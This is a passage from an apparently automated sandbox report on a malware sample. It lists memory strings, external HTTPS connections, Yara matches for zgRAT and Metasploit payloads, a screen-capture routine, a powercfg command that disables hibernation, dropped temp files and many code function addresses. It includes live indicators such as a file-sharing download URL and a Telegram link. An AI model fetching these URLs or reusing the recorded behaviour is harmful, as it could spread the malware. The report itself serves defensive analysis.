Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/edm0d
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comSetConsoleCursorPositionstre
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtransfer.net/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtransfer.net/EO
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtransfer.net/V
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5f

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53024
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53045
Source: unknown	Network traffic detected: HTTP traffic on port 53038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 53041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 53024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53038
Source: unknown	Network traffic detected: HTTP traffic on port 53035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53044
Source: unknown	Network traffic detected: HTTP traffic on port 53039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53041
Source: unknown	Network traffic detected: HTTP traffic on port 53044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.76.21.98:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.6:53024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:53035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53045 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

22_2_00418AB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpFE44.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp142.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Code function: 14_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

14_2_00403899

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	File created: C:\Windows\SunriseColeman
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_030A7AD7	0_2_030A7AD7
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_030A7AE0	0_2_030A7AE0
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05816158	0_2_05816158
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05817030	0_2_05817030
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05819DDA	0_2_05819DDA
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_0581DF58	0_2_0581DF58
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05913DB8	0_2_05913DB8
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05917990	0_2_05917990
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05910040	0_2_05910040
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05912AD0	0_2_05912AD0
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05913DA8	0_2_05913DA8
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05914F10	0_2_05914F10
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05914F20	0_2_05914F20
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05919690	0_2_05919690
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05916680	0_2_05916680
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05916640	0_2_05916640
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_0591967F	0_2_0591967F
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05917981	0_2_05917981
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_0591C89C	0_2_0591C89C
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05910006	0_2_05910006
Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05912ACB	0_2_05912ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049A110	2_2_0049A110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042C1F0	2_2_0042C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00436230	2_2_00436230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004302C0	2_2_004302C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004B0330	2_2_004B0330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004424E0	2_2_004424E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004BA530	2_2_004BA530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00508650	2_2_00508650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434690	2_2_00434690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047E8A0	2_2_0047E8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004348B0	2_2_004348B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00440A90	2_2_00440A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00496BB0	2_2_00496BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004B6D20	2_2_004B6D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00426D90	2_2_00426D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004BCDB0	2_2_004BCDB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004CF160	2_2_004CF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00481170	2_2_00481170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0046D250	2_2_0046D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00431360	2_2_00431360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00451300	2_2_00451300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004213A0	2_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00437680	2_2_00437680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433760	2_2_00433760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0049DA80	2_2_0049DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402100	2_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042A1E0	2_2_0042A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00516190	2_2_00516190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005121A0	2_2_005121A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004242B0	2_2_004242B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422640	2_2_00422640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402630	2_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044A710	2_2_0044A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005427C0	2_2_005427C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005667ED	2_2_005667ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042C8E0	2_2_0042C8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E9E0	2_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00440FF0	2_2_00440FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0054D02A	2_2_0054D02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004210E0	2_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00543169	2_2_00543169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D100	2_2_0042D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004432C0	2_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005612E0	2_2_005612E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00423470	2_2_00423470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0055F4DA	2_2_0055F4DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B5E0	2_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00405640	2_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004BF7C0	2_2_004BF7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0054F7F8	2_2_0054F7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00421820	2_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00425820	2_2_00425820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00551830	2_2_00551830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D8B0	2_2_0042D8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00561EFC	2_2_00561EFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401E90	2_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00515F95	2_2_00515F95
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Code function: 6_2_01782DD0	6_2_01782DD0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_0136A180	9_2_0136A180
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_0136A0A8	9_2_0136A0A8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_0136A3D2	9_2_0136A3D2
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_0136A3D8	9_2_0136A3D8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E94C0	9_2_056E94C0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056EE710	9_2_056EE710
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E56D0	9_2_056E56D0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E81C0	9_2_056E81C0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E15A8	9_2_056E15A8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E94B0	9_2_056E94B0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056EE700	9_2_056EE700
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056EA640	9_2_056EA640
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056EA630	9_2_056EA630
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E56CA	9_2_056E56CA
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056E81B0	9_2_056E81B0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056EB9A3	9_2_056EB9A3
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056EB9B0	9_2_056EB9B0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_056F89C8	9_2_056F89C8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_058A6B88	9_2_058A6B88
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_058A09B7	9_2_058A09B7
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_058A09C8	9_2_058A09C8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Code function: 9_2_058A3BD4	9_2_058A3BD4
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Code function: 14_2_00407577	14_2_00407577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00B5DC74	21_2_00B5DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D76948	21_2_04D76948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D70AFC	21_2_04D70AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D772D0	21_2_04D772D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D77C20	21_2_04D77C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D70040	21_2_04D70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D70006	21_2_04D70006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D70AF9	21_2_04D70AF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D77C10	21_2_04D77C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D71FF0	21_2_04D71FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_04D75A43	21_2_04D75A43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_060967D8	21_2_060967D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0609A3D8	21_2_0609A3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_06093F50	21_2_06093F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_06096FE8	21_2_06096FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_06096FF8	21_2_06096FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C9C9E0	22_2_69C9C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BB49F0	22_2_69BB49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C109A0	22_2_69C109A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C3A9A0	22_2_69C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C409B0	22_2_69C409B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BD6900	22_2_69BD6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BB8960	22_2_69BB8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C868E0	22_2_69C868E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C54840	22_2_69C54840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BD0820	22_2_69BD0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C0A820	22_2_69C0A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C86BE0	22_2_69C86BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C20BA0	22_2_69C20BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BFEA80	22_2_69BFEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C2EA00	22_2_69C2EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BFCA70	22_2_69BFCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C38A30	22_2_69C38A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B84DB0	22_2_69B84DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69D0CDC0	22_2_69D0CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C16D90	22_2_69C16D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CAAD50	22_2_69CAAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C4ED70	22_2_69C4ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69D08D20	22_2_69D08D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BDECD0	22_2_69BDECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B7ECC0	22_2_69B7ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C46C00	22_2_69C46C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B8AC60	22_2_69B8AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5AC30	22_2_69C5AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B8EFB0	22_2_69B8EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5EFF0	22_2_69C5EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B80FE0	22_2_69B80FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC8FB0	22_2_69CC8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B86F10	22_2_69B86F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C42F70	22_2_69C42F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC0F20	22_2_69CC0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BEEF40	22_2_69BEEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C20EC0	22_2_69C20EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C06E90	22_2_69C06E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B8AEC0	22_2_69B8AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C1EE70	22_2_69C1EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C60E20	22_2_69C60E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B801E0	22_2_69B801E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BF6130	22_2_69BF6130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C64130	22_2_69C64130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE8140	22_2_69BE8140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B900B0	22_2_69B900B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B78090	22_2_69B78090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C5C0B0	22_2_69C5C0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C4C000	22_2_69C4C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BCE070	22_2_69BCE070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C48010	22_2_69C48010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BDE3B0	22_2_69BDE3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BB23A0	22_2_69BB23A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BD43E0	22_2_69BD43E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BF2320	22_2_69BF2320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C9C360	22_2_69C9C360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69C16370	22_2_69C16370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC2370	22_2_69CC2370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B82370	22_2_69B82370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B88340	22_2_69B88340
